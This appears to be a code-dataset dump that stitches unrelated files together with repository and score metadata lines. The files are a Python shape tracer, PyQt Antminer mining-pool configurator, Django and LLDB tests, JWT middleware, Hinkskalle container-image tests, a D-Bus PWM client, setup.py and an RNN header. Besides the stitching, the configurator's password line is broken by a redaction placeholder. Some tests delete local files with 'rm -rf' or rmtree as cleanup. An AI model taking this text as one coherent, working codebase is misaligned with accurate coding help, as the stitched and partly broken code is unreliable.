#if len(ap) > 2: print (frame.f_locals)
obj = frame.f_locals[ap[0]]
for p in ap[1:]:
obj = getattr(obj, p)
var_shape = obj
if len(ap) > 2: print (var_shape)
return var_shape
def analyze_stmt (last_exec_stmt, line_no, func_name, filename, frame, trb):
debug = GLOBALS.debug
check_tsa = GLOBALS.check_tsa
shape_cache = GLOBALS.shape_cache
var, ann = get_var_ann_from_stmt(last_exec_stmt, frame)
#the current shape of x (named var) corresponds to post-execution of prev statement
# so we can check prev stmt's ann against x's shape
if debug: log (f'>> var, ann : {var}, {ann}')
if var is not None:
debug_log (f'\n({func_name}:{line_no}), var={var}', trb.index, level=DEBUG_LEVEL)
#print (frame.f_locals)
var_shape = get_var_shape(var, frame)
shape_cache.update_var_shape(var, var_shape, func_name, filename, line_no,
show=GLOBALS.show_updates)
if ann is not None and check_tsa:
shape_cache.shape_check(var, ann, func_name, line_no)
def get_earlier_exec_stmts (last_exec_line, curr_line, frame):
global GLOBALS
debug = GLOBALS.debug
co_src = inspect.getsourcelines(frame.f_code)
stmt_list, first_line = co_src
curr_idx = (curr_line - first_line)
if last_exec_line is None:
last_exec_line = curr_line - 1
last_idx = (last_exec_line - first_line)
earlier_stmts = [(first_line + i, stmt_list[i]) for i in range(last_idx, curr_idx)]
if debug:
log (last_exec_line, curr_line, last_idx, curr_idx, earlier_stmts, style='bold')
return earlier_stmts
def trace_lines(frame, event, arg):
global GLOBALS
debug = GLOBALS.debug
shape_cache = GLOBALS.shape_cache
if debug:
print (f'\n==> tracelines: event = {event}')
if event == 'line':
context_pos = 0
elif event == 'return':
context_pos = -1
else:
raise NotImplementedError(f'trace_lines: unknown event {event}')
#co = frame.f_code
#func_name = co.co_name
#print ('varnames: ', co.co_varnames, co.co_freevars)
co_src = inspect.getsourcelines(frame.f_code)
filename = frame.f_code.co_filename
#curr_line = curr_line - 1 - context_pos
curr_line = frame.f_lineno
func_name = get_function_name_from_frame(frame)
if debug:
log (f'trace_lines: function "{func_name}", executing line {curr_line}')
log(f'code {co_src[0]}')
trb = inspect.getframeinfo(frame, context=1)
#print (trb)
#code_context = trb.code_context
#curr_line = code_context[trb.index]
#print ('globals: ', frame.f_globals )
if event == 'return': curr_line += 1 #allow tracking the last line before return
stmts = get_earlier_exec_stmts (GLOBALS.last_exec_line, curr_line, frame)
for stmt_line, stmt in stmts:
analyze_stmt (stmt, stmt_line, func_name, filename, frame, trb)
GLOBALS.last_exec_line = curr_line
if event == 'return':
shape_cache.save('/tmp/shape_log.json')
GLOBALS.last_exec_line = None # function returns, so stop keeping track
if event != 'line':
#print (f'tracelines: event = {event}')
return
'''
frame_mem = inspect.getmembers(frame)
for name, v in frame_mem:
#print (name)
if name == 'f_locals':
print (name, v)
'''
import fnmatch
def trace_calls(frame, event, arg):
global GLOBALS
TRACE_INTO = GLOBALS.trace_into
debug = GLOBALS.debug
#print (frame, event, arg, frame.f_code.co_name)
if event == 'call':
co = frame.f_code
func_name = co.co_name
if func_name == 'write':
# Ignore write() calls from print statements
return
func_name = get_function_name_from_frame(frame)
#if func_name in TRACE_INTO:
# debug_log (f'> trying {func_name}, {co.co_filename}')
curr_line = frame.f_lineno
filename = co.co_filename
#log (f'>> call to {func_name} on line {curr_line} of {filename}')
if should_filter_call(filename, func_name): return
#log (f'>> call to {func_name} on line {curr_line} of {filename}: {TRACE_INTO}')
matched = False
if len(TRACE_INTO) == 0: matched = True
else:
matched = any([fnmatch.fnmatch(func_name, pat) for pat in TRACE_INTO])
#if len(TRACE_INTO) == 0 or func_name in TRACE_INTO or 'forward' in func_name:
if matched:
# Trace into this function
log(f'\n> Analyzing function {func_name}')
GLOBALS.last_exec_line = None #TODO: push curr_line on stack
return trace_lines
#return trace_calls
elif event == 'return':
debug_log (f'return {frame.f_code.co_name}')
assert False
def init_analyzer(trace_func_names=['main'], check_tsa=True, show_updates=True, debug=False, backend='pytorch'):
global GLOBALS
GLOBALS.debug = debug
GLOBALS.shape_cache = ShapeCache(debug, backend)
GLOBALS.trace_into = trace_func_names
GLOBALS.check_tsa = check_tsa
GLOBALS.show_updates = show_updates
GLOBALS.last_exec_line = None
#global SIZE2NAME
#assert False
sys.settrace(trace_calls)
#if __name__ == '__main__':
# main()
| 1.976563 | 2 |
bindings/python/test/Library/IO/IP.test.py | cowlicks/library-io | 0 | 12760313 | <reponame>cowlicks/library-io
# coding=utf-8
################################################################################################################################################################
# @project Library ▸ I/O
# @file LibraryIOPy/IP.test.py
# @author <NAME> <<EMAIL>>
# @license Apache License 2.0
################################################################################################################################################################
# IP
import Library.Core as Core
import LibraryIOPy as IO
URL = IO.URL
Request = IO.IP.TCP.HTTP.Request
Response = IO.IP.TCP.HTTP.Response
Client = IO.IP.TCP.HTTP.Client
response = Client.Get(URL.Parse("https://www.google.com"))
################################################################################################################################################################
| 1.710938 | 2 |
view/configureWindow.py | Minerboard/AntminerControll | 0 | 12760314 | from PyQt5.QtWidgets import (QMessageBox, QMainWindow, QLabel, QApplication, QPushButton, QLineEdit, QComboBox)
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSignal, Qt
from models.antminer import Antminer
import time
class ConfigureWindow(QMainWindow):
got_updates = pyqtSignal(str)
def __init__(self, parent=None, list_ip=None):
super(ConfigureWindow, self).__init__(parent)
self.item_list = list_ip
self.validation = False
self.move(100, 100)
self.setWindowTitle('Configure All ASIC')
self.center()
# print(list_ip)
self.err_lbl = QLabel(self)
self.err_lbl.setGeometry(135, 15, 150, 20)
self.setWindowIcon(QIcon('./assets/images/icon_tool.png'))
self.url_lbl = QLabel('<b>Pool URL:</b>', self)
self.url_lbl.setGeometry(20, 50, 100, 20)
self.worker_lbl = QLabel('<b>Worker:</b>', self)
self.worker_lbl.setGeometry(20, 90, 100, 20)
self.psd_lbl = QLabel('<b>Password:</b>', self)
self.psd_lbl.setGeometry(20, 130, 100, 20)
self.url_edt = QLineEdit(self)
self.url_edt.setPlaceholderText('Input pool: ')
self.url_edt.setGeometry(100, 50, 220, 20)
self.worker_edt = QLineEdit(self)
self.worker_edt.setPlaceholderText('Input workername: ')
self.worker_edt.setGeometry(100, 90, 220, 20)
self.psd_edt = QLineEdit(self)
self.psd_edt.setPlaceholderText('Input key: ')
self.psd_edt.setGeometry(100, 130, 220, 20)
self.connect_btn = QPushButton('Configure', self)
self.connect_btn.setGeometry(150, 185, 100, 30)
self.connect_btn.setStyleSheet('QPushButton {background-color: #009EDD; color: white;}')
self.connect_btn.clicked.connect(self.prepare_configure)
self.connect_btn.clicked.connect(self.configure_device)
self.comboBox = QComboBox(self)
self.comboBox.setGeometry(320, 20, 120, 20)
self.setFixedSize(450, 250)
self.share_combobox()
def prepare_configure(self):
self.pool = self.url_edt.text().strip()
self.worker = self.worker_edt.text().strip()
self.password = <PASSWORD>.text().strip()
if self.item_list and (self.pool and self.worker and self.password):
self.err_lbl.setText('<center><b>Start configuring.<br>It may take some minutes:</b></center>')
self.err_lbl.setStyleSheet('color: black')
self.connect_btn.setStyleSheet('background-color: #11f93f; color: white')
self.connect_btn.setText('Wait')
self.connect_btn.setEnabled(False)
self.validation = True
return
else:
self.err_lbl.setText('<center><b>Wrong Data</b></center>')
self.err_lbl.setStyleSheet('color: red')
self.validation = False
return
def configure_device(self):
if not self.validation:
return
self.error_message('Press Ok, to start scanning. It may take a long time')
curr_type = str(self.comboBox.currentText())
if not self.worker[-1].isnumeric():
counter = 0
else:
counter = int(self.worker[-1])
for item in self.item_list:
counter += 1
if item[1] == curr_type:
miner = Antminer(item[0])
result = miner.configure_asic(self.pool, self.worker+str(counter), self.password)
del miner
self.err_lbl.setText('<center><b>Complete!</b></center>')
self.err_lbl.setStyleSheet('color: green')
self.err_lbl.setText('')
self.connect_btn.setStyleSheet('QPushButton {background-color: #009EDD; color: white;}')
self.connect_btn.setText('Configure')
self.connect_btn.setEnabled(True)
# self.got_updates.emit('1')
def share_combobox(self):
if self.item_list:
buffer = []
for item in self.item_list:
if item[1] not in buffer:
buffer.append(item[1])
self.comboBox.addItem(item[1])
def error_message(self, message, header='Error'):
QMessageBox.information(self, header, str(message))
def center(self):
frameGm = self.frameGeometry()
screen = QApplication.desktop().screenNumber(QApplication.desktop().cursor().pos())
centerPoint = QApplication.desktop().screenGeometry(screen).center()
frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft()) | 2.046875 | 2 |
simple_mooc/core/tests/test_views.py | nikolasvargas/simple-mooc | 0 | 12760315 | from django.test import SimpleTestCase
from django.urls import reverse
class HomePageTests(SimpleTestCase):
def test_home_page_status_code(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_view_url_by_name(self):
response = self.client.get(reverse('core:index'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('core:index'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'home.html')
def test_view_does_not_contains_404(self):
response = self.client.get('/')
self.assertNotEqual(response.status_code, 404)
self.assertNotContains(response, '<span>(404)</span>')
class ContactPageTests(SimpleTestCase):
def test_contact_page_status_code(self):
response = self.client.get('/contact')
self.assertEqual(response.status_code, 200)
def test_view_url_by_name(self):
response = self.client.get(reverse('core:contact'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('core:contact'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'contact.html')
def test_view_does_not_contains_404(self):
response = self.client.get('/contact/')
self.assertNotEqual(response.status_code, 404)
self.assertNotContains(response, '<span>(404)</span>')
| 2.4375 | 2 |
training_django/middleware.py | evanezcent/Django-Training | 1 | 12760316 | <gh_stars>1-10
from functools import wraps
from todoproject.jwt import JWTAuth
from todoproject.response import Response
def jwtRequired(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
try:
decode(args[0].headers.get('Authorization'))
except Exception as e:
return Response.unauthorized()
return fn(*args, **kwargs)
return wrapper
def decode(token):
token = str(token).split(' ')
return JWTAuth().decode(token[1]) | 2.5 | 2 |
3.7.0/lldb-3.7.0.src/test/lang/objc/hidden-ivars/TestHiddenIvars.py | androm3da/clang_sles | 3 | 12760317 | """Test that hidden ivars in a shared library are visible from the main executable."""
import os, time
import unittest2
import lldb
from lldbtest import *
import lldbutil
import subprocess
class HiddenIvarsTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@skipUnlessDarwin
@dsym_test
def test_expr_with_dsym(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDsym()
self.expr(False)
@skipUnlessDarwin
@dsym_test
def test_expr_stripped_with_dsym(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDsym()
self.expr(True)
@skipUnlessDarwin
@dwarf_test
def test_expr_with_dwarf(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDwarf()
self.expr(False)
@skipUnlessDarwin
@dsym_test
def test_frame_variable_with_dsym(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDsym()
self.frame_var(False)
@skipUnlessDarwin
@dsym_test
def test_frame_variable_stripped_with_dsym(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDsym()
self.frame_var(True)
@skipUnlessDarwin
@dwarf_test
def test_frame_variable_with_dwarf(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDwarf()
self.frame_var(False)
@unittest2.expectedFailure("rdar://18683637")
@skipUnlessDarwin
@dsym_test
def test_frame_variable_across_modules_with_dsym(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDsym()
self.frame_var_type_access_across_module()
@unittest2.expectedFailure("rdar://18683637")
@skipUnlessDarwin
@dwarf_test
def test_frame_variable_across_modules_with_dwarf(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.buildDwarf()
self.frame_var_type_access_across_module()
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.m'
self.line = line_number(self.source, '// breakpoint1')
# The makefile names of the shared libraries as they appear in DYLIB_NAME.
# The names should have no loading "lib" or extension as they will be localized
self.shlib_names = ["InternalDefiner"]
def common_setup(self, strip):
if strip:
self.assertTrue(subprocess.call(['/usr/bin/strip', '-Sx', 'libInternalDefiner.dylib']) == 0, 'stripping dylib succeeded')
self.assertTrue(subprocess.call(['/bin/rm', '-rf', 'libInternalDefiner.dylib.dSYM']) == 0, 'remove dylib dSYM file succeeded')
self.assertTrue(subprocess.call(['/usr/bin/strip', '-Sx', 'a.out']) == 0, 'stripping a.out succeeded')
# Create a target by the debugger.
target = self.dbg.CreateTarget("a.out")
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Register our shared libraries for remote targets so they get automatically uploaded
environment = self.registerSharedLibrariesWithTarget(target, self.shlib_names)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple (None, environment, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
exe = os.path.join(os.getcwd(), "a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break inside the foo function which takes a bar_ptr argument.
lldbutil.run_break_set_by_file_and_line (self, "main.m", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs = [' resolved, hit count = 1'])
def expr(self, strip):
self.common_setup(strip)
# This should display correctly.
self.expect("expression (j->_definer->foo)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 4"])
self.expect("expression (j->_definer->bar)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 5"])
if strip:
self.expect("expression *(j->_definer)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 4"])
else:
self.expect("expression *(j->_definer)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 4", "bar = 5"])
self.expect("expression (k->foo)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 2"])
self.expect("expression (k->bar)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 3"])
self.expect("expression k.filteredDataSource", VARIABLES_DISPLAYED_CORRECTLY,
substrs = [' = 0x', '"2 objects"'])
if strip:
self.expect("expression *(k)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 2", ' = 0x', '"2 objects"'])
else:
self.expect("expression *(k)", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 2", "bar = 3", '_filteredDataSource = 0x', '"2 objects"'])
def frame_var(self, strip):
self.common_setup(strip)
# This should display correctly.
self.expect("frame variable j->_definer->foo", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 4"])
if not strip:
self.expect("frame variable j->_definer->bar", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 5"])
if strip:
self.expect("frame variable *j->_definer", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 4"])
else:
self.expect("frame variable *j->_definer", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 4", "bar = 5"])
self.expect("frame variable k->foo", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["= 2"])
self.expect("frame variable k->_filteredDataSource", VARIABLES_DISPLAYED_CORRECTLY,
substrs = [' = 0x', '"2 objects"'])
if strip:
self.expect("frame variable *k", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 2", '_filteredDataSource = 0x', '"2 objects"'])
else:
self.expect("frame variable *k", VARIABLES_DISPLAYED_CORRECTLY,
substrs = ["foo = 2", "bar = 3", '_filteredDataSource = 0x', '"2 objects"'])
def frame_var_type_access_across_module(self):
self.common_setup(False)
self.expect("frame variable k->bar", VARIABLES_DISPLAYED_CORRECTLY, substrs = ["= 3"])
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
| 2.25 | 2 |
features/tensor_parallel/configs/tp_2d.py | yuxuan-lou/ColossalAI-Examples | 39 | 12760318 | parallel = dict(
data=1,
pipeline=1,
tensor=dict(size=4, mode='2d'),
)
| 1.78125 | 2 |
backend/Hinkskalle/tests/models/test_Image.py | h3kker/hinkskalle | 4 | 12760319 | <gh_stars>1-10
from typing import Tuple
import unittest
from unittest import mock
from datetime import datetime, timedelta
import os.path
from shutil import which, rmtree
import subprocess
from Hinkskalle.models.Entity import Entity
from Hinkskalle.models.Collection import Collection
from Hinkskalle.models.Container import Container
from Hinkskalle.models.Image import Image, ImageSchema
from Hinkskalle.models.Tag import Tag
from Hinkskalle.tests.models.test_Collection import _create_collection
from Hinkskalle import db
from ..model_base import ModelBase
from .._util import _create_user, _create_image
class TestImage(ModelBase):
def test_image(self):
entity = Entity(name='test-hase')
db.session.add(entity)
db.session.commit()
coll = Collection(name='test-collection', entity_ref=entity)
db.session.add(coll)
db.session.commit()
container = Container(name='test-container',collection_ref=coll)
db.session.add(container)
db.session.commit()
image = Image(description='test-image', container_ref=container)
db.session.add(image)
db.session.commit()
read_image = Image.query.get(image.id)
self.assertTrue(abs(read_image.createdAt - datetime.now()) < timedelta(seconds=1))
self.assertEqual(read_image.container(), container.id)
self.assertEqual(read_image.containerName(), container.name)
self.assertEqual(read_image.collection(), coll.id)
self.assertEqual(read_image.collectionName(), coll.name)
self.assertEqual(read_image.entity(), entity.id)
self.assertEqual(read_image.entityName(), entity.name)
def test_manifest(self):
image = _create_image(media_type='application/vnd.sylabs.sif.layer.v1.sif')[0]
image.size = 666
manifest = image.generate_manifest()
self.assertRegex(manifest.content, r'"schemaVersion": 2')
self.assertRegex(manifest.content, rf'"digest": "sha256:{image.hash.replace("sha256.", "")}"')
self.assertRegex(manifest.content, rf'"org.opencontainers.image.title": "{image.container_ref.name}"')
self.assertRegex(manifest.content, rf'"size": {image.size}')
def test_manifest_mediatype(self):
image = _create_image(media_type='application/vnd.docker.image.rootfs.diff.tar.gzip')[0]
image.size = 666
db.session.commit()
with self.assertRaises(Exception):
image.generate_manifest()
def test_tags(self):
image = _create_image()[0]
tag1 = Tag(name='v1', image_ref=image)
db.session.add(tag1)
db.session.commit()
tag2 = Tag(name='v2', image_ref=image)
db.session.add(tag2)
db.session.commit()
self.assertListEqual(image.tags(), ['v1', 'v2'])
Tag.__table__.delete()
def test_tags_case(self):
image = _create_image()[0]
tag1 = Tag(name='TestHase', image_ref=image)
db.session.add(tag1)
db.session.commit()
self.assertListEqual(image.tags(), ['testhase'])
def test_access(self):
admin = _create_user(name='admin.oink', is_admin=True)
user = _create_user(name='user.oink', is_admin=False)
image = _create_image()[0]
self.assertTrue(image.check_access(admin))
self.assertTrue(image.check_access(user))
self.assertTrue(image.check_access(None))
def test_access_private(self):
admin = _create_user(name='admin.oink', is_admin=True)
user = _create_user(name='user.oink', is_admin=False)
image, container, _, _ = _create_image()
container.private = True
self.assertFalse(image.check_access(None))
self.assertTrue(image.check_access(admin))
self.assertFalse(image.check_access(user))
container.owner = user
self.assertTrue(image.check_access(user))
def test_update_access(self):
admin = _create_user(name='admin.oink', is_admin=True)
user = _create_user(name='user.oink', is_admin=False)
image, container, _, _ = _create_image()
self.assertTrue(image.check_update_access(admin))
self.assertFalse(image.check_update_access(user))
container.owner = user
self.assertTrue(image.check_update_access(user))
def test_schema(self):
schema = ImageSchema()
image = _create_image()[0]
serialized = schema.dump(image)
self.assertEqual(serialized.data['hash'], image.hash)
entity = Entity(name='Test Hase')
db.session.add(entity)
db.session.commit()
coll = Collection(name='Test Collection', entity_ref=entity)
db.session.add(coll)
db.session.commit()
container = Container(name='Test Container', collection_ref=coll)
db.session.add(container)
db.session.commit()
image.container_id=container.id
db.session.commit()
serialized = schema.dump(image)
self.assertDictEqual(serialized.errors, {})
self.assertEqual(serialized.data['container'], str(container.id))
self.assertEqual(serialized.data['containerName'], container.name)
self.assertEqual(serialized.data['collection'], str(coll.id))
self.assertEqual(serialized.data['collectionName'], coll.name)
self.assertEqual(serialized.data['entity'], str(entity.id))
self.assertEqual(serialized.data['entityName'], entity.name)
self.assertIsNone(serialized.data['deletedAt'])
self.assertFalse(serialized.data['deleted'])
def test_schema_tags(self):
schema = ImageSchema()
image = _create_image()[0]
tag1 = Tag(name='v1', image_ref=image)
db.session.add(tag1)
db.session.commit()
tag2 = Tag(name='v2', image_ref=image)
db.session.add(tag2)
db.session.commit()
serialized = schema.dump(image)
self.assertDictEqual(serialized.errors, {})
self.assertListEqual(serialized.data['tags'], ['v1', 'v2'])
Tag.__table__.delete()
def _get_test_path(self, name):
return os.path.join(os.path.dirname(__file__), "../share/", name)
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_inspect(self):
image = _create_image()[0]
image.location = self._get_test_path("busybox.sif")
image.uploaded = True
db.session.commit()
deffile = image.inspect()
self.assertEqual(deffile, 'bootstrap: docker\nfrom: busybox\n\n')
def test_check_file_file_not_found(self):
image = _create_image()[0]
image.location = self._get_test_path("migibtsnet.sif")
image.uploaded = True
db.session.commit()
with self.assertRaisesRegex(Exception, r"Image file.*does not exist"):
image._check_file()
def test_check_file_not_uploaded(self):
image = _create_image()[0]
image.uploaded = False
db.session.commit()
with self.assertRaisesRegex(Exception, r"Image is not uploaded yet"):
image._check_file()
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signed(self):
self.app.config['KEYSERVER_URL']='http://nonexistent/'
image = _create_image()[0]
image.location = self._get_test_path("busybox_signed.sif")
image.uploaded = True
db.session.commit()
sigdata = image.check_signature()
self.assertEqual(sigdata['Signatures'], 1)
self.assertIsNone(sigdata['SignerKeys'])
self.assertEqual(sigdata['Reason'], 'Unknown')
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signature_fail(self):
self.app.config['KEYSERVER_URL']='http://nonexistent/'
image = _create_image()[0]
# just something that is not a SIF
image.location = __file__
image.uploaded = True
db.session.commit()
with self.assertRaisesRegex(Exception, r'invalid SIF file'):
image.check_signature()
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signature_unsigned(self):
self.app.config['KEYSERVER_URL']='http://nonexistent/'
image = _create_image()[0]
image.location = self._get_test_path("busybox.sif")
image.uploaded = True
db.session.commit()
sigdata = image.check_signature()
self.assertEqual(sigdata['Signatures'], 0)
self.assertIsNone(sigdata['SignerKeys'])
self.assertEqual(sigdata['Reason'], 'Unsigned')
@unittest.skipIf(which("singularity") is None, "singularity not installed")
def test_signed_pubkey(self):
self.app.config['KEYSERVER_URL']='http://nonexistent/'
imp = subprocess.run(["singularity", "keys", "import", self._get_test_path("testhase-pub.asc")], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if imp.returncode != 0:
raise Exception(f"Test key import error: {imp.stderr}")
image = _create_image()[0]
image.location = self._get_test_path("busybox_signed.sif")
image.uploaded = True
db.session.commit()
sigdata = image.check_signature()
self.assertEqual(sigdata['Signatures'], 1)
self.assertDictContainsSubset({ 'Partition': 'Def.FILE', 'DataCheck': True }, sigdata['SignerKeys'][0]['Signer'])
rmtree(os.path.expanduser("~/.singularity/sypgp"))
def test_signed_mock(self):
image = _create_image(media_type=Image.singularity_media_type)[0]
image.location = self._get_test_path("busybox_signed.sif")
image.uploaded = True
db.session.commit()
with mock.patch('subprocess.run') as mock_sig:
mock_sig.return_value = mock.Mock(returncode=0, stdout='{ "Passed": true, "Signatures": 1 }')
sigdata = image.check_signature()
mock_sig.assert_called()
self.assertTrue(image.signed)
self.assertTrue(image.signatureVerified)
def test_skip_signature_non_singularity(self):
image = _create_image(media_type='oink')[0]
image.location = self._get_test_path("busybox_signed.sif")
image.uploaded = True
db.session.commit()
with mock.patch('subprocess.run') as mock_sig:
sigdata = image.check_signature()
mock_sig.assert_not_called()
self.assertDictEqual(sigdata, {'Passed': False, 'Reason': 'NotApplicable'})
def test_media_type(self):
image = _create_image()[0]
self.assertFalse(image.hide)
image.media_type='testhase'
self.assertTrue(image.hide)
image.media_type='application/vnd.sylabs.sif.layer.v1.sif'
self.assertFalse(image.hide)
image.hide = True
image.media_type = None
self.assertFalse(image.hide)
def test_make_filename(self):
image = _create_image()[0]
fn = image.make_filename()
self.assertEquals(fn, f"{image.hash}.sif")
image.media_type='grunz'
fn = image.make_filename()
self.assertEquals(fn, f"{image.hash}")
def test_make_prettyname(self):
image = _create_image()[0]
fn = image.make_prettyname('v1')
self.assertEquals(fn, f"{image.entityName()}/{image.collectionName()}/{image.containerName()}_v1.sif")
image.media_type='grunz'
fn = image.make_prettyname('v1')
self.assertEquals(fn, f"{image.entityName()}/{image.collectionName()}/{image.containerName()}_v1") | 2.1875 | 2 |
piio/_piio_pwm.py | daniel-blake/piio-client | 0 | 12760320 | <filename>piio/_piio_pwm.py
import gobject
import dbus
import dbus.service
import dbus.mainloop.glib
from _event import Event
from _dbus_smartobject import DBusSmartObject,NoConnectionError
from _piio import PiIo, PiIoGroup, PiIoDict
class PiIoGroupPwm (PiIoGroup):
'''
Access piio Digital IO Groups
Attributes:
PwmValueChanged: Event(handle, value) - an event triggers when a pwm value changed
Note that the handle provided on these events is the short handle relative to this IO Group.
'''
def __init__(self,path):
'''
Initialize the object for a Digital IO Group connection
'''
self._dbus_itf_iogroup_pwm='nl.miqra.PiIo.IoGroup.Pwm'
# declare events
self.PwmValueChanged = Event() # arguments: handle, value
self.pwms = PiIoDict()
PiIoGroup.__init__(self,path)
def _init_busobject(self,busobject):
PiIoGroup._init_busobject(self,busobject)
# connect_to_signal registers our callback function.
busobject.connect_to_signal('PwmValueChanged', self._pwmValueChanged)
# register pwms
# catch an exception that occurs if we're not connected
try:
# add pwms if they were not already registered (in case of reconnect
for handle in self._pwmHandles():
handle = str(handle)
if not self.pwms.has_key(handle):
o = PwmOutput(self, handle)
self.pwms[handle] = o
except NoConnectionError as x:
print "Error: Lost connection to piio-server during initialization"
def _pwmValueChanged(self,handle, value):
""" gets called when a pwm pin has it's value changed
"""
self.pwms[handle]._trigger("PwmValueChanged");
self.PwmValueChanged(handle, value)
def _pwmHandles(self):
return self._call("Pwms",interface=self._dbus_itf_iogroup_pwm)
PiIo.RegisterClass('nl.miqra.PiIo.IoGroup.Pwm', PiIoGroupPwm)
class PwmOutput(object):
'''
Generic base object for Digital IO units
'''
def __init__(self,iogroup,handle):
self._iogroup = iogroup
self._handle = handle
self.OnChanged = Event();
def Name(self):
'''
The name of this IO
'''
return self._iogroup.Name() + "." + self.handle;
@property
def Handle(self):
'''
The handle of this IO
'''
return str(self._handle)
@property
def Min(self):
'''
Minimum value of pwm
'''
return self._trycall("GetMin",self._handle,default=None)
@property
def Max(self):
'''
Maximum value of pwm
'''
return self._trycall("GetMax",self._handle,default=None)
@property
def Value(self):
'''
The current value of this IO
(returns the same as .value)
'''
return self._get()
@Value.setter
def Value(self,val):
return self._set(val)
# duplicate property with lowercase name
@property
def value(self):
'''
The current value of this IO
(returns the same as .Value)
'''
return self._get()
@Value.setter
def value(self,val):
return self._set(val)
# call a function on the IO Group
def _call(self, method, *args, **kwargs):
kwargs['interface'] = self._iogroup._dbus_itf_iogroup_pwm
val = self._iogroup._call(method, *args, **kwargs)
# print "Return value of {0} is {1}".format(method,val)
return val
# call a function on the IO Group that retu
def _trycall(self, method, *args, **kwargs):
kwargs['interface'] = self._iogroup._dbus_itf_iogroup_pwm
val = self._iogroup._trycall(method, *args, **kwargs)
# print "Return value of {0} is {1}".format(method,val)
return val
def _get(self,default=None):
return self._trycall("GetValue",self._handle,default=default)
def _set(self, value):
return self._trycall("SetValue",self._handle,value)
def _trigger(self,value=None):
self.OnChanged(value)
| 2.484375 | 2 |
setup.py | ceppelli/magic_foundation | 0 | 12760321 | <filename>setup.py
import setuptools
import codecs
import os.path
def read(rel_path):
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, rel_path), 'r') as fp:
return fp.read()
def get_version(rel_path):
for line in read(rel_path).splitlines():
if line.startswith('__version__'):
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError('Unable to find version string.')
with open('README.md', 'r') as fh:
long_description = fh.read()
setuptools.setup(
name='magic_foundation',
version=get_version('src/magic_foundation/__init__.py'),
author='<NAME>',
author_email='<EMAIL>',
description='Minimalistic library that simplifies the adoption of async/await (asyncio) programming style in a multithreaded application.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/ceppelli/magic_foundation',
package_dir={'': 'src'},
packages=setuptools.find_packages(where='src'),
license='BSD 3-clause "New" or "Revised License"',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Framework :: AsyncIO',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
project_urls={
'CI: travis': 'https://travis-ci.com/github/ceppelli/magic_foundation',
'Coverage: codecov': 'https://codecov.io/github/ceppelli/magic_foundation',
'GitHub: issues': 'https://github.com/ceppelli/magic_foundation/issues',
'GitHub: repo': 'https://github.com/ceppelli/magic_foundation',
},
python_requires='>=3.7',
) | 1.867188 | 2 |
src/neural_networks/RNN.py | Manezki/TwitMine | 0 | 12760322 | import torch
import torch.nn as nn
import numpy as np
import json
import shutil
import sys
import torch.nn.functional as F
from torch.autograd import Variable
from os import path as op
from matplotlib import pyplot, patches
MAX_LEN = 140 # Lenth of a tweet
BATCH_SIZE = 512
